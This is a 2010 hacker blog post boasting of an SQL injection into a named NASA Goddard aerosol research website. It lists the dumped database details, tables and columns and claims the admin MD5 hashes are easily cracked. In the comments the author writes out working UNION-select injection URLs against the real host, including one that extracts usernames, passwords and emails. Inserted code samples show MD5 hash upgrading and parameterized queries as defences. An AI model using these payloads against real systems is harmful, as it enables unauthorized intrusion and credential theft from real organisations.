The Center for Aerosol Research NASA website security issues

January 22nd, 2010, by TinKode. Posted in MySQL Injection.

				 _   _           _____
				| \ | |   /\    / ____|  /\
				|  \| |  /  \  | (___   /  \
				| . ` | / /\ \  \___ \ / /\ \
				| |\  |/ ____ \ ____) / ____ \
				|_| \_/_/    \_\_____/_/    \_\
						#TinKode@Romania

            The Center for Aerosol Research at NASA's Goddard Space Flight Center

                                    

The Goddard Space Flight Center (GSFC) is a major NASA space research laboratory established on May 1, 1959 as NASA’s first space flight center. GSFC employs approximately 10,000 civil servants and contractors, and is located approximately 6.5 miles (10.5 km) northeast of Washington, D.C. in Greenbelt, Maryland, USA. GSFC, one of ten major NASA field centers, is named in recognition of Dr. Robert H. Goddard (1882-1945), the pioneer of modern rocket propulsion in the United States.

Vulnerable website: http://aerocenter.gsfc.nasa.gov

I want to say that it was very hard to make this injection.
The webserver had good protection but wasn’t fully secured.
This kind only works manually, you can’t do it with apps.

In this picture you can see the visible columns:

Main information:

#Version:5.0.82-log
#User:carwww@localhost
#Database:aerocenter
#Datadir:/var/mysql/

Here we can see all databases:

[1] information_schema
[2] aerocenter
[3] car
[4] test

In this screenshot are all tables from all databases:

I don’t know exactly which database each table belongs to… so I think I have not split them very well.

Tables from “aerocenter” database:

[1] files
[2] milagro_users
[3] modis_wshop
[4] news
[5] news_files
[6] personnel
[7] siteupdate
[8] test
[9] users
[10] workshop_files
[11] yoram2007
[12] yoram2007_agenda

Tables from “car” database:

[1] car_content
[2] car_data_info
[3] car_data_missions
[4] car_data_overview
[5] car_data_quicklooks
[6] car_files
[7] car_homefeature
[8] car_homefeature_title
[9] car_homeimage
[10] car_homemission
[11] car_images
[12] car_news
[13] car_news_files
[14] car_pers_ordering
[15] car_personal_pages
[16] car_personnel
[17] car_publications
[18] car_publications_authors
[19] car_publications_coauthors
[20] car_sections
[21] car_siteupdate
[22] car_subsections
[23] car_users

Tables from “test” database:

[1] content
[2] homeimage
[3] hometext
[4] images
[5] news
[6] news_files
[7] personnel
[8] publications
[9] publications_authors
[10] publications_coauthors
[11] sections
[12] siteupdate
[13] subsections
[14] users

Columns from all databases:

Here we have the same situation as with the tables…

[1] filename
[2] title
[3] user
[4] actualname
[5] firstname
[6] lastname
[7] username
[8] userpassword
[9] userlevel
[10] status
[11] email
[12] phone
[13] affiliation
[14] focusgroup
[15] flag
[16] date_entered
[17] event_date
[18] time
[19] location
[20] art_title
[21] talk_title
[22] art_content
[23] article_id
[24] rank
[25] cal_lastname
[26] cal_firstname
[27] cal_middlename
[28] cal_email
[29] fax
[30] su_content
[31] last_updated
[32] badge
[33] citizen
[34] country
[35] content
[36] ordering
[37] section_title
[38] subsection_title
[39] header
[40] link_text_before
[41] linked_text
[42] link_url
[43] link_text_after
[44] html
[45] mission_id
[46] flight_number
[47] date
[48] time_flight
[49] time_data
[50] aircraft_type
[51] flight_scientist
[52] lat_long
[53] flight_map_lg
[54] modis_img_lg
[55] goes_img
[56] details
[57] flight_schedule
[58] anim_img_type
[59] static_img_type
[60] modis_credit
[61] flight_track_credit
[62] quicklook_credit
[63] details_credit
[64] modis_anim
[65] modis_aqua
[66] modis_terra
[67] goes_utc
[68] kmz_file
[69] mission_name
[70] year
[71] objective
[72] logo
[73] logo_width
[74] logo_height
[75] table_number
[76] data
[77] flight_num
[78] img_sm
[79] img_lg
[80] content_id
[81] image
[82] image_alt
[83] image_align
[84] active
[85] feature_title
[86] image_caption
[87] image_large
[88] id_ordering
[89] order_id
[90] page_id
[91] pers_id
[92] middlename
[93] profile_active
[94] profile_img
[95] class
[96] onlinestatus
[97] classification
[98] monthdays
[99] found_in
[101] eds
[102] publication
[103] volume
[104] issue
[105] pages
[106] pub_id
[107] author
[108] lab_member_auth
[109] coauthors
[110] lab_member_coauth
[111] sectionTitile
[112] parentSection
[113] cal_login
[114] cal_passwd
[115] profile
[116] profile_img1
[117] profile_img2

Admin accounts:


These hashes are md5() and they can be easily cracked.
Bye, TinKode! :)
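
Unsalted MD5 in a `userpassword` column is weak because the digest is fast to compute and identical passwords produce identical hashes. The added example below (not from the original post or the site's code) shows one way to retire such hashes without a forced reset: wrap each stored MD5 digest in salted PBKDF2, then verify logins against the wrapped value. The record format, iteration count, function names and sample rows are assumptions.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # assumed work factor; tune to your hardware


def legacy_md5(password: str) -> str:
    """The scheme the post describes: an unsalted md5() hex digest."""
    return hashlib.md5(password.encode()).hexdigest()


def wrap_legacy_hash(md5_hex: str) -> str:
    """Upgrade a stored MD5 digest in place, without knowing the password.

    The MD5 hex string becomes the input to salted PBKDF2-HMAC-SHA256, so the
    fast, unsalted digest no longer sits in the database.
    """
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", md5_hex.encode(), salt, ITERATIONS)
    return f"pbkdf2-md5${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify(password: str, record: str) -> bool:
    """Check a login attempt against a wrapped record in constant time."""
    scheme, iterations, salt_hex, dk_hex = record.split("$")
    if scheme != "pbkdf2-md5":
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256",
        legacy_md5(password).encode(),
        bytes.fromhex(salt_hex),
        int(iterations),
    )
    return hmac.compare_digest(candidate, bytes.fromhex(dk_hex))


# Constructed sample rows: two accounts that share one password.
rows = {"alice": legacy_md5("Spring2010!"), "bob": legacy_md5("Spring2010!")}
upgraded = {user: wrap_legacy_hash(digest) for user, digest in rows.items()}
```

After wrapping, the two accounts no longer share a stored value, and each record can be replaced by a direct PBKDF2 hash of the password the next time its owner logs in.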

27 Responses to “The Center for Aerosol Research NASA website security issues”

  1. site:nasa.gov … wtf:) ur the best haxor ! ave ave

  2. [...] This post was mentioned on Twitter by Insane, phr0nak. phr0nak said: RT @TinKode: NASA have problems again, Hacked, TinKode http://bit.ly/6VpyNE [...]

  3. You are a dead man tinkode.

  4. Social comments and analytics for this post…

    This post was mentioned on Twitter by TinKode: NASA have problems again, Hacked, TinKode http://bit.ly/6VpyNE...

  5. annonymous Says:

    I find it funny what people consider “skilled”… Anyone can go through a site and test every param until they find a SQL Inj, nothing impressive. I’d like to know what was so hard about ‘making’ the injection? You couldn’t use your automated tools??

  6. 1. If anyone can, why didn’t you find this first? When you see all things, it’s very easy to open your mouth!

    2. It was hard because I spent 30 minutes to understand one thing!
    http://aerocenter.gsfc.nasa.gov/XXXXX/XXX.php?id=0‘+union+all+select+1,2,3,4,concat(schema_name),5+from+information_schema.schemata–’ (Doesn’t work)

    To be able to see the databases, I had to add (something) after the “real syntax”, like:
    http://aerocenter.gsfc.nasa.gov/XXXXX/XXX.php?id=0‘+union+all+select+1,2,3,4,concat(schema_name),5+from+information_schema.schemata+order+by–’

    For usernames:
    http://aerocenter.gsfc.nasa.gov/XXXXX/XXX.php?id=0‘+union+all+select+1,2,3,4,concat_ws(0x3a,username,userpassword,email),5+from+users+where+username=”–’
    etc…

    3. And if you know how to read: “This kind only works manually, you can’t do it with apps.”
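
The query strings in the reply above work because the `id` value is concatenated into the SQL text. As an added example (not part of the original comment or the site's code), this compares that pattern with input validation plus a bound parameter, using Python's `sqlite3` as a stand-in for the PHP/MySQL stack; the table layout, function names and sample rows are constructed.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a constructed in-memory stand-in for the site's database."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE news (id INTEGER, a, b, c, title, d);
        CREATE TABLE users (username, userpassword, email);
        INSERT INTO news VALUES (1, '', '', '', 'Workshop agenda posted', '');
        INSERT INTO users VALUES ('editor', 'constructed-hash', 'editor@example.org');
        """
    )
    return db


def titles_concatenated(db: sqlite3.Connection, raw_id: str) -> list:
    """Vulnerable pattern: request input is pasted into the SQL text."""
    sql = "SELECT id, a, b, c, title, d FROM news WHERE id = '" + raw_id + "'"
    return [row[4] for row in db.execute(sql)]


def titles_parameterized(db: sqlite3.Connection, raw_id: str) -> list:
    """Hardened pattern: validate the type, then bind the value as data."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []  # an id is a number; reject everything else before the DB
    sql = "SELECT id, a, b, c, title, d FROM news WHERE id = ?"
    return [row[4] for row in db.execute(sql, (int(raw_id),))]


# Constructed input with the same shape as the query strings quoted above.
PAYLOAD = "0' UNION ALL SELECT 1,2,3,4,username || ':' || userpassword,5 FROM users--"
```

Binding closes the injection point; restricting the web account to the single schema the application needs limits what any remaining flaw can read.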

  7. [...] claims that the web server was quite well secured and that the attack required great effort, but [...]

  8. ddoliciouss Says:

    omg tink, you are the best :-j

  9. just seen this on twitter cheers for the info.

  10. I frequently don

  11. ? ??? ??? ?????..

  12. y0 u plzo s74r7 h4ck1ng s0mething wh1ch 1s worth 1t?
    L1k3 c11m473sk3p71c5!!!!!!!!1!!!!!!!!

  13. The poor guys at NASA pay 500.000 $ but make fools of themselves with things like this :-J

    gj tinkode

  14. Hello.. I want to subscribe to your blog but I cannot find your rss link, please help. Thanks. – Jen

  15. Hi how are you i really liked this.

  16. A similar story, twitter.com got passwords stolen on sunday. It appears no site is unbreakable.

  17. Hey. I don’t follow many blogs, but yours is one of the few I follow. Have a nice day!

  18. ?????? ????? ????????.

  19. Great blog. I like the design, where can I find it?

  20. Just attempt to smile for regarding 2-3 mins then you can get back to work

  21. Keep posting stuff like this i really like it

  22. Hey, I just discovered your site on Bing. You have a really great blog, I will certainly drop by here again now and then! Your posts are really great too! Kind regards

  23. Hi there ! If you need someone to make your product or service be developed in France, don’t hesitate to contact me. I’m based in Paris core next to the “Champs Elys

  24. For some reason only half of the post is being displayed, is it my browser or the site??

  25. Can you email me back, please. Thanks so much.

  26. Man I wish my blog was as well written as yours! :) great work! I guess I am still learning and started on a tough topic, dating tips!
